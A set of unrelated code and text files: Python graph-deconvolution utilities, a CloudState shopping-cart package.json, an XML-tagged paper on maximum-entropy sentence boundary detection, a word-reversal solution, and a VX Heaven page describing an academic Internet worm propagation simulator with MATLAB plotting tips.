       S. Gardner. Large-scale mapping and validation of escherichia coli
       transcriptional regulation from a compendium of expression profiles.
       PLoS Biology, 2007
    """
    R = np.zeros(M.shape)
    # Per-row mean and standard deviation of the similarity matrix.
    Id = [[0, 0] for i in range(M.shape[0])]
    for i in range(M.shape[0]):
        mu_i = np.mean(M[i, :])
        sigma_i = np.std(M[i, :])
        Id[i] = [mu_i, sigma_i]
    for i in range(M.shape[0]):
        for j in range(i + 1, M.shape[0]):
            # z-scores clipped at zero. BUGFIX: the original divided by the
            # row *mean* (Id[.][0]) and never used the computed std; CLR is
            # defined with z = (M_ij - mu) / sigma. A zero std (constant
            # row) yields a zero z-score instead of a division by zero.
            z_i = max(0., (M[i, j] - Id[i][0]) / Id[i][1]) if Id[i][1] > 0 else 0.
            z_j = max(0., (M[i, j] - Id[j][0]) / Id[j][1]) if Id[j][1] > 0 else 0.
            R[i, j] = np.sqrt(z_i**2 + z_j**2)
            R[j, i] = R[i, j]  # Symmetric
    return R
def aracne(m, **kwargs):
    """Implementation of the ARACNE algorithm.

    .. note::
       For networkx graphs, use the cdt.utils.graph.remove_indirect_links function

    Args:
        m (numpy.ndarray): matrix, if it is a square matrix, the program assumes
            it is a relevance matrix where m(i,j) represents the similarity content
            between nodes i and j. Elements of matrix should be
            non-negative.

    Returns:
        numpy.ndarray: Output deconvolved matrix (direct dependency matrix). Its components
            represent direct edge weights of observed interactions.

    Example:
        >>> from cdt.utils.graph import aracne
        >>> import networkx as nx
        >>> # Generate sample data
        >>> from cdt.data import AcyclicGraphGenerator
        >>> graph = AcyclicGraphGenerator(linear).generate()[1]
        >>> adj_mat = nx.adjacency_matrix(graph).todense()
        >>> output = aracne(adj_mat)

    .. note::
       Ref: ARACNE: An Algorithm for the Reconstruction of Gene Regulatory Networks in a Mammalian Cellular Context
       Adam A Margolin, Ilya Nemenman, Katia Basso, Chris Wiggins, Gustavo Stolovitzky, Riccardo Dalla Favera and Andrea Califano
       DOI: https://doi.org/10.1186/1471-2105-7-S1-S7
    """
    mi_floor = kwargs.get('I0', 0.0)  # No default thresholding
    dpi_tol = kwargs.get('W0', 0.05)

    # Zero out every entry at or below the mutual-information floor.
    m = np.where(m > mi_floor, m, 0)

    # Data-processing inequality: in every triangle, the weakest edge is
    # considered indirect and removed when its weight is below the tolerance.
    size = m.shape[0]
    for a in range(size - 2):
        for b in range(a + 1, size - 1):
            for c in range(b + 1, size):
                sides = [(a, b), (b, c), (a, c)]
                weights = [m[u, v] for u, v in sides]
                weakest = min(range(3), key=lambda idx: weights[idx])
                if 0 < weights[weakest] < dpi_tol:
                    u, v = sides[weakest]
                    m[u, v] = m[v, u] = 0.
    return m
def remove_indirect_links(g, alg="aracne", **kwargs):
    """Prune indirect links from a networkx graph via matrix deconvolution.

    Args:
        g (networkx.Graph): Graph to apply deconvolution to
        alg (str): Algorithm to use ('aracne', 'clr', 'nd')
        kwargs (dict): extra options forwarded to the chosen algorithm

    Returns:
        networkx.Graph: graph with undirected links removed.

    Example:
        >>> from cdt.utils.graph import remove_indirect_links
        >>> import networkx as nx
        >>> # Generate sample data
        >>> from cdt.data import AcyclicGraphGenerator
        >>> graph = AcyclicGraphGenerator(linear).generate()[1]
        >>> output = remove_indirect_links(graph, alg='aracne')
    """
    backends = {"aracne": aracne,
                "clr": clr,
                "nd": network_deconvolution}
    deconvolve = backends[alg]
    # Fix the node ordering so matrix indices can be mapped back to labels.
    nodes = list(g.nodes())
    weights = np.array(nx.adjacency_matrix(g, nodelist=nodes).todense())
    relabeling = {index: label for index, label in enumerate(nodes)}
    return nx.relabel_nodes(nx.DiGraph(deconvolve(weights, **kwargs)),
                            relabeling)
def dagify_min_edge(g):
    """Input a graph and output a DAG.

    The heuristic is to reverse the edge with the lowest score of the cycle
    if possible (i.e. if it strictly reduces the number of cycles),
    else remove it.

    Args:
        g (networkx.DiGraph): Graph to modify to output a DAG (modified in place)

    Returns:
        networkx.DiGraph: DAG made out of the input graph.

    Example:
        >>> from cdt.utils.graph import dagify_min_edge
        >>> import networkx as nx
        >>> import numpy as np
        >>> # Generate sample data
        >>> graph = nx.DiGraph((np.ones(4) - np.eye(4)) *
                               np.random.uniform(size=(4,4)))
        >>> output = dagify_min_edge(graph)
    """
    ncycles = len(list(nx.simple_cycles(g)))
    while not nx.is_directed_acyclic_graph(g):
        cycle = next(nx.simple_cycles(g))
        # Gather every edge of the cycle together with its weight,
        # including the closing edge (last node -> first node).
        edges = [(cycle[-1], cycle[0])]
        scores = [(g[cycle[-1]][cycle[0]]['weight'])]
        for i, j in zip(cycle[:-1], cycle[1:]):
            edges.append((i, j))
            scores.append(g[i][j]['weight'])
        # Candidate for modification: the weakest edge of the cycle.
        i, j = edges[scores.index(min(scores))]
        # Try the reversal on a copy to see whether it reduces the cycles.
        gc = deepcopy(g)
        gc.remove_edge(i, j)
        gc.add_edge(j, i)
        ngc = len(list(nx.simple_cycles(gc)))
        if ngc < ncycles:
            # Reversing strictly reduces the cycle count: keep the edge's
            # information by flipping its direction.
            g.add_edge(j, i, weight=min(scores))
            g.remove_edge(i, j)
            ncycles = ngc
        else:
            # BUGFIX: the original had no fallback here, so the loop could
            # spin forever when reversal did not help. Per the documented
            # heuristic, drop the edge instead; the edge count strictly
            # decreases, so the loop always terminates.
            g.remove_edge(i, j)
            ncycles = len(list(nx.simple_cycles(g)))
    return g
| {
"pile_set_name": "Github"
} |
{
"name": "js-shopping-cart",
"version": "0.1.0",
"description": "Sample CloudState event sourced shopping cart application",
"keywords": [
"serverless",
"cloudstate",
"event-sourcing"
],
"engineStrict": true,
"engines": {
"node": "~12"
},
"homepage": "https://github.com/cloudstateio/cloudstate",
"bugs": {
"url": "https://github.com/cloudstateio/cloudstate/issues"
},
"license": "Apache-2.0",
"author": {
"name": "James Roper",
"email": "[email protected]",
"url": "https://jazzy.id.au"
},
"repository": {
"type": "git",
"url": "https://github.com/cloudstateio/cloudstate",
"directory": "src/samples/js-shopping-cart"
},
"//": "https://npm.community/t/npm-install-does-not-install-transitive-dependencies-of-local-dependency/2264",
"dependencies": {
"@grpc/proto-loader": "^0.1.0",
"cloudstate": "file:../../node-support",
"google-protobuf": "^3.11.4",
"grpc": "^1.24.2"
},
"devDependencies": {
"chai": "4.2.0",
"mocha": "^6.2.3"
},
"scripts": {
"test": "mocha",
"prestart": "compile-descriptor ../../protocols/example/shoppingcart/shoppingcart.proto",
"pretest": "compile-descriptor ../../protocols/example/shoppingcart/shoppingcart.proto",
"postinstall": "compile-descriptor ../../protocols/example/shoppingcart/shoppingcart.proto",
"prepare-node-support": "cd ../../node-support && npm install && cd ../samples/js-shopping-cart",
"start": "node index.js",
"start-no-prestart": "node index.js",
"dockerbuild": "npm run prepare-node-support && docker build -f ../../Dockerfile.js-shopping-cart -t ${DOCKER_PUBLISH_TO:-cloudstateio}/js-shopping-cart:latest ../..",
"dockerpush": "docker push ${DOCKER_PUBLISH_TO:-cloudstateio}/js-shopping-cart:latest",
"dockerbuildpush": "npm run dockerbuild && npm run dockerpush"
}
}
| {
"pile_set_name": "Github"
} |
<PAPER>
<S sid="0">A Maximum Entropy Approach To Identifying Sentence Boundaries</S>
<ABSTRACT>
<S sid="1" ssid="1">We present a trainable model for identifying sentence boundaries in raw text.</S>
<S sid="2" ssid="2">Given a corpus annotated with sentence boundaries, our model learns to classify each occurrence of., ?, and !as either a valid or invalid sentence boundary.</S>
<S sid="3" ssid="3">The training procedure requires no hand-crafted rules, lexica, part-of-speech tags, or domain-specific information.</S>
<S sid="4" ssid="4">The model can therefore be trained easily on any genre of English, and should be trainable on any other Romanalphabet language.</S>
<S sid="5" ssid="5">Performance is comparable to or better than the performance of similar systems, but we emphasize the simplicity of retraining for new domains.</S>
</ABSTRACT>
<SECTION title="1 Introduction" number="1">
<S sid="6" ssid="1">The task of identifying sentence boundaries in text has not received as much attention as it deserves.</S>
<S sid="7" ssid="2">Many freely available natural language processing tools require their input to be divided into sentences, but make no mention of how to accomplish this (e.g.</S>
<S sid="8" ssid="3">(Brill, 1994; Collins, 1996)).</S>
<S sid="9" ssid="4">Others perform the division implicitly without discussing performance (e.g.</S>
<S sid="10" ssid="5">(Cutting et al., 1992)).</S>
<S sid="11" ssid="6">On first glance, it may appear that using a short list, of sentence-final punctuation marks, such as ., ?, and !, is sufficient.</S>
<S sid="12" ssid="7">However, these punctuation marks are not used exclusively to mark sentence breaks.</S>
<S sid="13" ssid="8">For example, embedded quotations may contain any of the sentence-ending punctuation marks and . is used as a decimal point, in email addresses, to indicate ellipsis and in abbreviations.</S>
<S sid="14" ssid="9">Both ! and ? are somewhat less ambiguous *The authors would like to acknowledge the support of ARPA grant N66001-94-C-6043, ARO grant DAAH0494-G-0426 and NSF grant SBR89-20230. but appear in proper names and may be used multiple times for emphasis to mark a single sentence boundary.</S>
<S sid="15" ssid="10">Lexically-based rules could be written and exception lists used to disambiguate the difficult cases described above.</S>
<S sid="16" ssid="11">However, the lists will never be exhaustive, and multiple rules may interact badly since punctuation marks exhibit absorption properties.</S>
<S sid="17" ssid="12">Sites which logically should be marked with multiple punctuation marks will often only have one ((Nunberg, 1990) as summarized in (White, 1995)).</S>
<S sid="18" ssid="13">For example, a sentence-ending abbreviation will most likely not be followed by an additional period if the abbreviation already contains one (e.g. note that D.0 is followed by only a single . in The president lives in Washington, D.C.).</S>
<S sid="19" ssid="14">As a result, we believe that manually writing rules is not a good approach.</S>
<S sid="20" ssid="15">Instead, we present a solution based on a maximum entropy model which requires a few hints about what information to use and a corpus annotated with sentence boundaries.</S>
<S sid="21" ssid="16">The model trains easily and performs comparably to systems that require vastly more information.</S>
<S sid="22" ssid="17">Training on 39441 sentences takes 18 minutes on a Sun Ultra Sparc and disambiguating the boundaries in a single Wall Street Journal article requires only 1.4 seconds.</S>
</SECTION>
<SECTION title="2 Previous Work" number="2">
<S sid="23" ssid="1">To our knowledge, there have been few papers about identifying sentence boundaries.</S>
<S sid="24" ssid="2">The most recent work will be described in (Palmer and Hearst, To appear).</S>
<S sid="25" ssid="3">There is also a less detailed description of Palmer and Hearst's system, SATZ, in (Palmer and Hearst, 1994).'</S>
<S sid="26" ssid="4">The SATZ architecture uses either a decision tree or a neural network to disambiguate sentence boundaries.</S>
<S sid="27" ssid="5">The neural network achieves 98.5% accuracy on a corpus of Wall Street Journal We recommend these articles for a more comprehensive review of sentence-boundary identification work than we will be able to provide here. articles using a lexicon which includes part-of-speech (POS) tag information.</S>
<S sid="28" ssid="6">By increasing the quantity of training data and decreasing the size of their test corpus, Palmer and Hearst achieved performance of</S>
<S sid="29" ssid="7">98.9% with the neural network.</S>
<S sid="30" ssid="8">They obtained similar results using the decision tree.</S>
<S sid="31" ssid="9">All the results we will present for our algorithms are on their initial, larger test corpus.</S>
<S sid="32" ssid="10">In (Riley, 1989), Riley describes a decision-tree based approach to the problem.</S>
<S sid="33" ssid="11">His performance on the Brown corpus is 99.8%, using a model learned from a corpus of 25 million words.</S>
<S sid="34" ssid="12">Liberman and Church suggest in (Liberman and Church, 1992) that a system could be quickly built to divide newswire text into sentences with a nearly negligible error rate, but do not actually build such a system.</S>
</SECTION>
<SECTION title="3 Our Approach" number="3">
<S sid="35" ssid="1">We present two systems for identifying sentence boundaries.</S>
<S sid="36" ssid="2">One is targeted at high performance and uses some knowledge about the structure of English financial newspaper text which may not be applicable to text from other genres or in other languages.</S>
<S sid="37" ssid="3">The other system uses no domain-specific knowledge and is aimed at being portable across English text genres and Roman alphabet languages.</S>
<S sid="38" ssid="4">Potential sentence boundaries are identified by scanning the text for sequences of characters separated by whitespace (tokens) containing one of the symbols !, . or ?.</S>
<S sid="39" ssid="5">We use information about the token containing the potential sentence boundary, as well as contextual information about the tokens immediately to the left and to the right.</S>
<S sid="40" ssid="6">We also conducted tests using wider contexts, but performance did not improve.</S>
<S sid="41" ssid="7">We call the token containing the symbol which marks a putative sentence boundary the Candidate.</S>
<S sid="42" ssid="8">The portion of the Candidate preceding the potential sentence boundary is called the Prefix and the portion following it is called the Suffix.</S>
<S sid="43" ssid="9">The system that focused on maximizing performance used the following hints, or contextual &quot;templates&quot;: The templates specify only the form of the information.</S>
<S sid="44" ssid="10">The exact information used by the maximum entropy model for the potential sentence boundary marked by . in Corp. in Example 1 would be: PreviousWordIsCapitalized, Prefix= Corp, Suffix=NULL, PrefixFeature=CorporateDesignator.</S>
<S sid="45" ssid="11">The highly portable system uses only the identity of the Candidate and its neighboring words, and a list of abbreviations induced from the training data.2 Specifically, the &quot;templates&quot; used are: The information this model would use for Example 1 would be: PreviousWord=ANLP, FollowingWord=chairmon, Prefix=Corp, Suffix=NULL, PrefixFeature=InducedAbbreviation.</S>
<S sid="46" ssid="12">The abbreviation list is automatically produced from the training data, and the contextual questions are also automatically generated by scanning the training data. with question templates.</S>
<S sid="47" ssid="13">As a. result, no hand-crafted rules or lists are required by the highly portable system and it can be easily retrained for other languages or text genres.</S>
</SECTION>
<SECTION title="4 Maximum Entropy" number="4">
<S sid="48" ssid="1">The model used here for sentence-boundary detection is based on the maximum entropy model used for POS tagging in (Ratna.parkhi, 1996).</S>
<S sid="49" ssid="2">For each potential sentence boundary token (., ?, and !</S>
<S sid="50" ssid="3">), we estimate a. joint, probability distribution p of the token and its surrounding context, both of which are denoted by c, occurring as an actual sentence boundary.</S>
<S sid="51" ssid="4">The distribution is given by: $p(b, c) = \pi \prod_{j} \alpha_j^{f_j(b, c)}$, where $b \in \{no, yes\}$, where the $\alpha_j$'s are the unknown parameters of the model, and where each $\alpha_j$ corresponds to an $f_j$, or a feature.</S>
<S sid="52" ssid="5">Thus the probability of seeing an actual sentence boundary in the context c is given by p(yes, c).</S>
<S sid="53" ssid="6">The contextual information deemed useful for sentence-boundary detection, which. we described earlier, must be encoded using features.</S>
<S sid="54" ssid="7">For example, a useful feature might be: This feature will allow the model to discover that the period at the end of the word Mr. seldom occurs as a sentence boundary.</S>
<S sid="55" ssid="8">Therefore the parameter corresponding to this feature will hopefully boost the probability p(no, c) if the Prefix is Mr.</S>
<S sid="56" ssid="9">The parameters are chosen to maximize the likelihood of the training data, using the Generalized Iterative Scaling (Darroch and Ratcliff, 1972) algorithm.</S>
<S sid="57" ssid="10">The model also can be viewed under the Maximum Entropy framework, in which we choose a distribution p that maximizes the entropy H (p) where /:5(b, c) is the observed distribution of sentenceboundaries and contexts in the training data.</S>
<S sid="58" ssid="11">As a result, the model in practice tends not to commit towards a particular outcome (yes or no) unless it has seen sufficient evidence for that outcome; it is maximally uncertain beyond meeting the evidence.</S>
<S sid="59" ssid="12">All experiments use a simple decision rule to classify each potential sentence boundary: a potential sentence boundary is an actual sentence boundary if and only if p(yesic) > .5, where and where c is the context including the potential sentence boundary.</S>
</SECTION>
<SECTION title="5 System Performance" number="5">
<S sid="60" ssid="1">We trained our system on 39441 sentences (898737 words) of Wall Street Journal text from sections 00 through 24 of the second release of the Penn Treebank3 (Marcus, Santorini, and Marcinkiewicz, 1993).</S>
<S sid="61" ssid="2">We corrected punctuation mistakes and erroneous sentence boundaries in the training data.</S>
<S sid="62" ssid="3">Performance figures for our best performing system, which used a hand-crafted list of honorifics and corporate designators, are shown in Table 1.</S>
<S sid="63" ssid="4">The first test set, WSJ, is Palmer and Hearst's initial test data and the second is the entire Brown corpus.</S>
<S sid="64" ssid="5">We present the Brown corpus performance to show the importance of training on the genre of text. on which testing will be performed.</S>
<S sid="65" ssid="6">Table 1 also shows the number of sentences in each corpus, the number of candidate punctuation marks, the accuracy over potential sentence boundaries, the number of false positives and the number of false negatives.</S>
<S sid="66" ssid="7">Performance on the WSJ corpus was, as we expected, higher than performance on the Brown corpus since we trained the model on financial newspaper text.</S>
<S sid="67" ssid="8">Possibly more significant. than the system's performance is its portability to new domains and languages.</S>
<S sid="68" ssid="9">A trimmed down system which used no information except that derived from the training corpus performs nearly as well, and requires no resources other than a training corpus.</S>
<S sid="69" ssid="10">Its performance on the same two corpora is shown in Table 2.</S>
<S sid="70" ssid="11">Since 39441 training sentences is considerably more than might exist in a new domain or a language other than English, we experimented with the quantity of training data required to maintain performance.</S>
<S sid="71" ssid="12">Table 3 shows performance on the WSJ corpus as a. function of training set size using the best performing system and the more portable system.</S>
<S sid="72" ssid="13">As can be seen from the table, performance degrades as the quantity of training data decreases, but even with only 500 example sentences performance is better than the baselines of 64.0% if a sentence boundary is guessed at every potential site and 78.4% if only token-final instances of sentence-ending punctuation are assumed to be boundaries.</S>
</SECTION>
<SECTION title="6 Conclusions" number="6">
<S sid="73" ssid="1">We have described an approach to identifying sentence boundaries which performs comparably to other state-of-the-art systems that require vastly more resources.</S>
<S sid="74" ssid="2">For example, Riley's performance on the Brown corpus is higher than ours, but his system is trained on the Brown corpus and uses thirty times as much data as our system.</S>
<S sid="75" ssid="3">Also, Palmer and Hearst's system requires POS tag information, which limits its use to those genres or languages for which there are either POS tag lexica or POS tag annotated corpora that could be used to train automatic taggers.</S>
<S sid="76" ssid="4">In comparison, our system does not require POS tags or any supporting resources beyond the sentence-boundary annotated corpus.</S>
<S sid="77" ssid="5">It is therefore easy and inexpensive to retrain this system for different genres of text in English and text in other Roman-alphabet languages.</S>
<S sid="78" ssid="6">Furthermore, we showed tha.t a small training corpus is sufficient for good performance, and we estimate that annotating enough data to achieve good performance would require only several hours of work, in comparison to the many hours required to generate POS tag and lexical probabilities.</S>
</SECTION>
<SECTION title="7 Acknowledgments" number="7">
<S sid="79" ssid="1">We would like to thank David Palmer for giving us the test data he and Marti Hearst used for their sentence detection experiments.</S>
<S sid="80" ssid="2">We would also like to thank the anonymous reviewers for their helpful insights.</S>
</SECTION>
</PAPER>
| {
"pile_set_name": "Github"
} |
# -*- coding:utf-8 -*-
class Solution:
    def ReverseSentence(self, s):
        """Reverse the order of the words in ``s``.

        Whitespace structure is preserved by treating the string as an
        alternating sequence of word tokens and space-run tokens and
        reversing the token order (so "I am a student." becomes
        "student. a am I").

        BUGFIX: the original whole-string-reverse + per-word-reverse loop
        glued trailing spaces onto the last word when the input started
        with a space (e.g. " a b" produced "b  a" instead of "b a ").

        Args:
            s (str): input sentence; may be empty.

        Returns:
            str: the sentence with word order reversed ('' for empty input).
        """
        if not s:
            return ''
        # Split into maximal runs of spaces / non-spaces.
        tokens = []
        current = s[0]
        for ch in s[1:]:
            if (ch == ' ') == (current[0] == ' '):
                current += ch
            else:
                tokens.append(current)
                current = ch
        tokens.append(current)
        # Reversing the token list reverses the words while keeping each
        # space run between its (now swapped) neighbours.
        return ''.join(reversed(tokens))

    def Reverse(self, lis):
        """Reverse ``lis`` in place with two pointers and return it.

        Returns the empty string '' (not an empty list) for falsy input;
        this quirk is kept for backward compatibility with existing callers.
        """
        if not lis:
            return ''
        start, end = 0, len(lis) - 1
        while start < end:
            lis[start], lis[end] = lis[end], lis[start]
            start += 1
            end -= 1
        return lis
"pile_set_name": "Github"
} |
<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Internet Worm Propagation Simulator - Моделювання комп'ютерних вірусів (VX heaven)</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<meta name="Author" content=""/>
<meta name="KeyWords" lang="en" content="computer virus, virus, virii,vx, компьютерные вирусы, вирус, вири"/>
<meta name="Description" content="Author's description In our research on Internet worm modeling, I have written two Internet worm propagation simulators. One simulator is for simulation of uniform scan worms, such as Code Red and Slammer; another is for simulation of sequential scan worms, such as Blaster. The sequential scan worm simulator assumes that vulnerable hosts are uniformly distributed in BGP routable space. Both are high level simulators for simulating a worm's propagation in the whole Internet. I have not considered packet-level events and Internet topological effect. These simulators do not consider human's countermeasures and congestions caused by worm scan traffic. However, you can decrease the worm's average scan rate in the codes to consider congestion effect; and you can easily modify the codes to consider simple human countermeasures, such as considering the removal of infected hosts that follows Kermack-Mckendrick epidemic model. Both simulators are written in C language for the consideration of simulation speed. They output their simulation results into data files. I write MATLAB programs to draw figures for our papers and to use Kalman filter for early worm detection (please see our papers in CCS'02 and CCS'03). The C simulator for a uniform scan worm is: simulator-codered-100run.cpp The C simulator for a sequential scan worm is: blaster-multiMonitor-100run.cpp The Matlab program for Kalman filter early detection is: KalmanDetection.m The Matlab program to draw a worm's propagation curves is: blasterCodeRedCompare.m The BGP non-overlapping prefix data used in Blaster simulator is (from Route View project for data on Sept. 22, 2003): prefix-len.20030922 The Matlab Simulink program for numerical solution of simple epidemic model is: simpleModel.mdl Notes: The simulators have detailed inline document (both are for 100 simulation runs). 
For further explanation of formulas, notations, and usage, please see our early worm detection paper in CCS'03 and our recent submitted journal version paper on early worm detection. You can see the Matlab program blasterCodeRedCompare.m to know how to extract data from output data files. In both simulators, we do not use any model. The propagation of a uniform scan worm or a sequential scan follows the simple epidemic model very well when the number of hosts in a simulation is large. MATLAB is very good for data processing and for generating figures for academic paper. We have seen many papers having simulation figures with too small fonts and too thin curves, which can be easily solved by using Matlab. When you use "plot" command in matlab to draw a figure, you can then use the menu in the matlab figure window to directly edit this figure. You can add legend, change font size of labels or axis, change the thickness of curves, add text box, draw lines or arrows, add markers (circle, triangle, square, etc) on curves, change axis' labels, etc. For me, I always first maximize the figure window, then use menu "edit"->"figure property"->"apply template" to change all font size to 20 and curve thickness to 2. In this way, the figure will have clear readable fonts and curves in my paper. You can set up this template by using menu "edit"->"figure property"->"change template". After this "apply template" step, I save the figure in Matlab figure format to prepare for future edition and then export it as a EPS color file for my Latex paper. Thus for each figure, I generate two files, one is .fig and one is .eps. (this .fig is also useful when you make Powerpoint slides) After the "apply template" step, if I need, I can change a curve's line pattern or color, size and name of font of each individual object by first selecting this object, then using menu "edit"->"current object properties". 
To add readable markers on curves, I use the following command in matlab program to generate figure: t=1:15:1000; plot(t, data(t),'b--'); Then I add markers on this curve through matlab figure window (without "t", markers on one curve will squeeze together). If you use Latex to write academic paper, I have written a document to introduce how to write Latex paper in Windows more conveniently than in Linux."/>
<script type="text/javascript">
//<![CDATA[
try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mirage2:0,oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok3v=1613a3a185/"},atok:"047a5bcbf67431883fc9ed25fba33612",petok:"506990d424d584beb3e0c22033b09ee50c7a39b2-1498760112-1800",zone:"vxheaven.org",rocket:"a",apps:{}}];document.write('<script type="text/javascript" src="//ajax.cloudflare.com/cdn-cgi/nexp/dok3v=85b614c0f6/cloudflare.min.js"><'+'\/script>');}}catch(e){};
//]]>
</script>
<link rel="icon" href="/favicon.ico" type="image/x-icon"/>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/>
<link rel="stylesheet" type="text/css" href="/style.css"/>
<script type="text/rocketscript" data-rocketsrc="https://apis.google.com/js/plusone.js">{"parsetags": "explicit"}</script>
</head>
<body bgcolor="#dbc8a0" text="#302000" link="#225599" vlink="#113366">
<div class="s1">
<h1><a href="/" style="text-decoration: none; color: #000000;">VX Heaven</a></h1>
<span class="nav"><a href="/lib/">Бiблiотека</a> <a href="/vl.php">Колекція</a> <a href="/src.php">Тексти вірусів</a> <a href="/vx.php?id=eidx">Двигуни</a> <a href="/vx.php?id=tidx">Конструктори</a> <a href="/vx.php?id=sidx">Моделювання</a> <a href="/vx.php?id=uidx">Утиліти</a> <a href="/links.php">Посилання</a> <a href="/donate.php" style="color: #706020" id="donate">Пожертвувати</a> <a href="/forum" style="text-decoration: underline;">Форум</a> </span><br clear="all"/>
</div>
<div><div style="float:right;"><a href="/vx.php?tbs=0"><img src="/img/min.gif" alt="Minimize"/></a></div> <form id="lf" style="margin: 0; float: right;" method="get" action="/index.php"><input type="hidden" name="action" value="set"/><select name="lang" onchange="javascript:document.getElementById('lf').submit();"><option value="ru">Русский</option><option value="en">English</option><option selected="selected" value="ua">Українська</option><option value="de">Deutsch</option><option value="es">Español</option><option value="fr">Français</option><option value="it">Italiano</option><option value="pl">Polski</option></select></form>
<div style="float: right;"><div id="plusone"></div></div>
<script type="text/rocketscript">gapi.plusone.render("plusone", {"size":"small","count":"true"});</script>
<div style="float: right;" class="addthis_toolbox addthis_default_style">
<script type="text/rocketscript">var addthis_config = { ui_click: true }</script>
<a style="text-decoration: none; font-size: 10pt;" href="/?action=addthis" class="addthis_button_compact">Додайте в закладки</a>
<script type="text/rocketscript" data-rocketsrc="http://s7.addthis.com/js/250/addthis_widget.js#username=herm1t"></script>
</div>
<div style="float: left;">
<script type="text/rocketscript" data-rocketsrc="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
<form action="/search.php" id="cse-search-box">
<input type="hidden" name="cx" value="002577580816726040001:z9_irkorydo"/>
<input type="hidden" name="cof" value="FORID:10"/>
<input type="hidden" name="ie" value="UTF-8"/>
<input type="text" name="q" size="32" value=" "/>
<input type="submit" name="sa" value="Пошук"/>
</form>
</div><br clear="both"/></div>
<div class="s2"> [<a href="/vx.php?id=sh00">Попередня</a>] [<a href="/vx.php?id=sidx">До індексу</a>] [<a href="/vx.php?id=sn00">Наступна</a>] <h1> Internet Worm Propagation Simulator</h1><p><strong>Автор: Zou, Cliff</strong></p><p><strong>Author's description</strong></p>
<p>In our research on Internet worm modeling, I have written two Internet worm propagation simulators. One simulator is for simulation of uniform scan worms, such as Code Red and Slammer; another is for simulation of sequential scan worms, such as Blaster. The sequential scan worm simulator assumes that vulnerable hosts are uniformly distributed in BGP routable space.</p>
<p>Both are high level simulators for simulating a worm's propagation in the whole Internet. I have not considered packet-level events and Internet topological effect. These simulators do not consider human's countermeasures and congestions caused by worm scan traffic. However, you can decrease the worm's average scan rate in the codes to consider congestion effect; and you can easily modify the codes to consider simple human countermeasures, such as considering the removal of infected hosts that follows Kermack-Mckendrick epidemic model.</p>
<p>Both simulators are written in C language for the consideration of simulation speed. They output their simulation results into data files. I write MATLAB programs to draw figures for our papers and to use Kalman filter for early worm detection (please see our papers in CCS'02 and CCS'03).</p>
<ul>
<li>The C simulator for a uniform scan worm is: simulator-codered-100run.cpp</li>
<li>The C simulator for a sequential scan worm is: blaster-multiMonitor-100run.cpp</li>
<li>The Matlab program for Kalman filter early detection is: KalmanDetection.m</li>
<li>The Matlab program to draw a worm's propagation curves is: blasterCodeRedCompare.m</li>
<li>The BGP non-overlapping prefix data used in Blaster simulator is (from Route View project for data on Sept. 22, 2003): prefix-len.20030922</li>
<li>The Matlab Simulink program for numerical solution of simple epidemic model is: simpleModel.mdl</li>
</ul>
<p>Notes:</p>
<ol>
<li>The simulators have detailed inline document (both are for 100 simulation runs). For further explanation of formulas, notations, and usage, please see our early worm detection paper in CCS'03 and our recent submitted journal version paper on early worm detection. You can see the Matlab program blasterCodeRedCompare.m to know how to extract data from output data files.</li>
<li>In both simulators, we do not use any model. The propagation of a uniform scan worm or a sequential scan follows the simple epidemic model very well when the number of hosts in a simulation is large.</li>
<li>MATLAB is very good for data processing and for generating figures for academic paper. We have seen many papers having simulation figures with too small fonts and too thin curves, which can be easily solved by using Matlab. When you use "plot" command in matlab to draw a figure, you can then use the menu in the matlab figure window to directly edit this figure. You can add legend, change font size of labels or axis, change the thickness of curves, add text box, draw lines or arrows, add markers (circle, triangle, square, etc) on curves, change axis' labels, etc.
<p>For me, I always first maximize the figure window, then use menu "edit"->"figure property"->"apply template" to change all font size to 20 and curve thickness to 2. In this way, the figure will have clear readable fonts and curves in my paper. You can set up this template by using menu "edit"->"figure property"->"change template". After this "apply template" step, I save the figure in Matlab figure format to prepare for future editing and then export it as an EPS color file for my Latex paper. Thus for each figure, I generate two files, one is .fig and one is .eps. (this .fig is also useful when you make Powerpoint slides)</p>
<p>After the "apply template" step, if I need, I can change a curve's line pattern or color, size and name of font of each individual object by first selecting this object, then using menu "edit"->"current object properties". To add readable markers on curves, I use the following command in matlab program to generate figure: t=1:15:1000; plot(t, data(t),'b--'); Then I add markers on this curve through matlab figure window (without "t", markers on one curve will squeeze together).</p></li>
<li>If you use Latex to write academic paper, I have written a document to introduce how to write Latex paper in Windows more conveniently than in Linux.</li>
</ol><br clear="all"/><script type="text/rocketscript">var disqus_url = 'http://vxheaven.org/vx.php?id=si00';</script><a href="/vx.php?id=si00#disqus_thread">Коментарі</a><br/><div style="float:left;"><div style="float: left;"><strong>Скачати</strong></div><br clear="all"/><table cellspacing="0" cellpadding="0" border="1"><tr bgcolor="#aaa999"><th> </th><th>Назва файлу</th><th>Розмір</th><th>Description</th><th>Дата</th><th> </th></tr><tr bgcolor="#cccbbb"><td><form class="fr" method="post" action="/file.php"><input type="image" src="/img/dl.gif" alt="Download"/><input type="hidden" name="file" value="c2ltL2l3cHMuemlw"/></form></td><td><a name="f1461"></a><small><a href="/dl/sim/iwps.zip">iwps.zip</a></small></td><td><small>190458</small></td><td><small>IWPS</small></td><td><small>Feb 2004</small></td><td><small style="float: right; font-family: fixed;">MD5 sum 815759fc506fb4b652e9bc47caf6d3c0</small></td></tr></table></div><br clear="all"/><br/><div class="s2">
<div id="disqus_thread"></div>
<script type="text/rocketscript">
/* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
var disqus_shortname = 'vxheaven'; // required: replace example with your forum shortname
/* * * DON'T EDIT BELOW THIS LINE * * */
(function() {
var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
</script>
<noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript></div>
